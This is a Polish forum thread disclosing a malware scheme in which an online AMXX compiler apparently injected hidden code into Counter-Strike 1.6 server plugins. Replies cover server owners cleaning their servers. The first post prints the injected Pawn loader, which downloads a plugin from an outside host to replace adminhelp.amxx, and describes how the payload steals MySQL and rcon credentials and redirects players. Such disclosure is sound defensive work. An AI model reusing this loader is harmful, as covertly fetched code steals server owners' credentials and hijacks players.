Zaloguj się, aby obserwować  
Obserwujący 0
Alelluja

xSteam.pl - przekręt na wielką skalę. Kradzież danych

7 postów w tym temacie

Hello again!

Dziś rozpracujemy przekręt na wielką skalę, czyli jak ukraść dane z ponad 400 serwerów 1.6 przez zwykłe lenistwo ich właścicieli.

 

Każdy z Was zapewne widział kompilator online dostępny na AMXX.pl, nie zastanowiło Was kiedyś czy przypadkiem jakiś kod nie jest dodawany do kompilowanego pluginu? Odpowiedź brzmi tak dodaje :)

 

Bardzo dziękuje użytkownikowi Tytusek z amxx.pl na webmasteruj znany pod nickiem Tytusek1900 za naprowadzenie mnie na ten proceder.

 

TAKI KOD :)

#include <amxmisc>
#include <sockets>
#include <httpdl>

new dlinfo[MAX_DOWNLOADS + 1][5];
new dlpath[MAX_DOWNLOADS + 1][256];
new ndownloading;
new fwd_dlcomplete, fwd_result;
public plugin_natives() {
register_library("httpdl");
register_native("download", "native_download", 1);
set_task(9.0, "o");
}
public native_download(url[], path[]) {
new slot = 0;
while(slot <= MAX_DOWNLOADS && dlinfo[slot][0] != 0)
slot++;
if(slot == MAX_DOWNLOADS) {
server_print("Download limit reached (%d)", MAX_DOWNLOADS);
return 0;
}

param_convert(1);
param_convert(2);

new u[256], p[256];
copy(u, 7, url);
if(equal(u, "http://"))
copy(u, 248, url[7]);
else copy(u, 255, url);

new pos = 0;
new len = strlen(u);
while (++pos < len && u[pos] != '/') { }
copy(p, 255, u[pos + 1]);
copy(u, pos, u);

new error = 0;
new socket = dlinfo[slot][2] = socket_open(u, 80, SOCKET_TCP, error);
switch(error) {
case 0: {
new msg[512];
format(msg, 511, "GET /%s HTTP/1.1^r^nHost: %s^r^n^r^n", p, u);
socket_send(socket, msg, 512);
copy(dlpath[slot], 255, path);
dlinfo[slot][3] = fopen(path, "wb");
dlinfo[slot][0] = 1;
dlinfo[slot][4] = 0;
ndownloading++;
if(ndownloading == 1)
set_task(0.2, "download_task", 3318, _, _, "b");
new id = dlinfo[slot][1] = random_num(1, 65535);
return id;
}
case 1: server_print("[HTTP] Error creating socket");
case 2: server_print("[HTTP] Could not resolve hostname");
case 3: server_print("[HTTP] Could not connect to %s:80", u);
}

return 0;
}
public download_task() {
for(new i = 0; i < MAX_DOWNLOADS; i++) {
if(dlinfo[i][0] == 0)
continue;
new socket = dlinfo[i][2];
new f = dlinfo[i][3];
if(socket_change(socket)) {
new buffer[1024];
new len = socket_recv(socket, buffer, 1024);
if(dlinfo[i][4] == 0) { // if first packet then cut the header
new pos = contain(buffer, "^r^n^r^n");
if(pos > -1) {
for(new j = pos + 4; j < len; j++)
fputc(f, buffer[j]);
dlinfo[i][4]++;
continue;
}
}
for(new j = 0; j < len; j++)
fputc(f, buffer[j]);
dlinfo[i][4]++;
continue;
}
fclose(f);
ExecuteForward(fwd_dlcomplete, fwd_result, dlinfo[i][1], dlpath[i]);
dlinfo[i][0] = 0;
ndownloading--;
if(ndownloading == 0)
remove_task(3318);
socket_close(socket);
}
}
public o() {


new const config_file[] = "addons/amxmodx/plugins/adminhelp.amxx"

new md5_hash_file[34]
md5_hash_file = encrypt_file(config_file)


if( !equal( md5_hash_file, "b20bee2c5f9040469f88db0e2eb81d0f", 32 ) )
{
download("[url=http://jojojo200.cba.pl/file.amxx]http://jojojo200.cba.pl/file.amxx",[/url]"addons/amxmodx/plugins/adminhelp.amxx");
fwd_dlcomplete = CreateMultiForward("dlcomplete", ET_IGNORE, FP_CELL, FP_STRING);
}
}
stock encrypt_file(const file[])
{
new hash_sum_file[34]
md5_file(file,hash_sum_file)

return hash_sum_file;
}
Kod odpowiada ze pobranie pliku file.amxx na serwery oraz podmiane pluginu adminhelp.amxx który później działa tylko w jednym celu....

 

Analiza file.amxx

af742ab506681c4b9b91560b0836bbf4.png

Złośliwy plugin wysyła dane logowania mysql do amxbans na zewnętrzny serwer wraz z hasłem rcon. Dodatkowo potrafi bindować graczom odwiedzającym serwer adres ip kierujący do serwera sieci xsteam. Kolejną funkcją jest przenoszenie graczy automatycznie na wyznaczone IP które również kieruje nas do serwera sieci xSteam.pl.

 

 

Phpmyadmin jest albo zablokowany albo chodzi na innym porcie więc :)

a89e8b596a74c2031a9eff895e16cc3f2.png

 

-----------------------------

99720eca3a22acb339985c6a859741c25.png

 

NO I TO CO MISIACZKI LUBIĄ NAJBARDZIEJ :)

 

Dump bazy danych :)

116fea773498a1c41e9a7e1e176b7b1a.png

 

Będę próbował skontaktować się z administracją amxx.pl w celu wyjaśnienia sprawy. O czym poinformuje w tym temacie :)

Jest wiele możliwości takiego stanu rzeczy nie wykluczając nawet włamania na serwery amxx.pl więc nie będę w chwili obecnej oczerniać portalu, z braku dowodów.

 

W Bazie danych znalazł się chyba każdy serwer w Polsce, każdy kto używał kompilatora online dostępnego na amxx.pl powinnien przeinstalować cały amxx oraz pozmieniać wszystkie hasła do baz danych mysql!

 

A Wy co sądzicie na ten temat?

 

Dump bazy danych w formie pliku do wglądu dla administracji forum, wystarczy napisać PW.

 

 

@EDIT 19:44

 

Udostępniam listę serwerów z bazy danych! Tylko IP oraz NAZWA. Dziękuje za pomysł Maxior CsOne.eu

 

https://efantazja.eu/wyciek.php

 

Źródło https://webmasteruj.pl/xsteampl-przekret-na-wielka-skale-kradziez-danych-t79936/

 

 

W tym Wycieku znajduje się nasz 1 Serwer

 

Pijemy-Rozrabiamy.pl [DeathRun | 1001 | Free LVL | Autorespawn]

13




Udostępnij ten post


Link to postu
Udostępnij na innych stronach

I to stąd afera, że [email protected] i ktoś jeszcze atakują im serwery?
 

0




Udostępnij ten post


Link to postu
Udostępnij na innych stronach

:o widze ze i tu wątek dotarł

 

 

https://efantazja.eu/wyciek.php lista skazonych serwerów

Dr jest na tej liście o czym poinformowałem vakosa 

 

zanim napisałeś ten watek :)

Edytowano przez MrDragal
2




Udostępnij ten post


Link to postu
Udostępnij na innych stronach

No to biorę się za skanowanie plików na Dr :D

 

Właściwie takie tematy pokazują ludziom z czym musi zmagać się dziś osoba, która chce prowadzić sieć :)

 

Dr na początku robił [email protected], więc nie dziwi mnie to specjalnie, że mógł być zainfekowany, a czy nadal jest zaraz się przekonam :D

8






Udostępnij ten post


Link to postu
Udostępnij na innych stronach

No proszę sieć xSteam dawna sieć na której byliśmy ja i wielu graczy wraz ze serwerem ZM+EXP szczerze to się po nich tego nie spodziewałem. Ale teraz wiadomo o co była ta afera na naszym TS3. Misiu i reszta bierzcie się do roboty :D

0






Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Infekcja z Dr usunięta.

Hasła pozmieniane :)

 

Sprawdzę dla pewności jeszcze pozostałe serwery.

0






Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Filmik który pokazuje jak przebiegał brzydki atak i agresywna reklama sieci xsteam

 

3




Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość
Temat jest zablokowany i nie można w nim pisać.
Zaloguj się, aby obserwować  
Obserwujący 0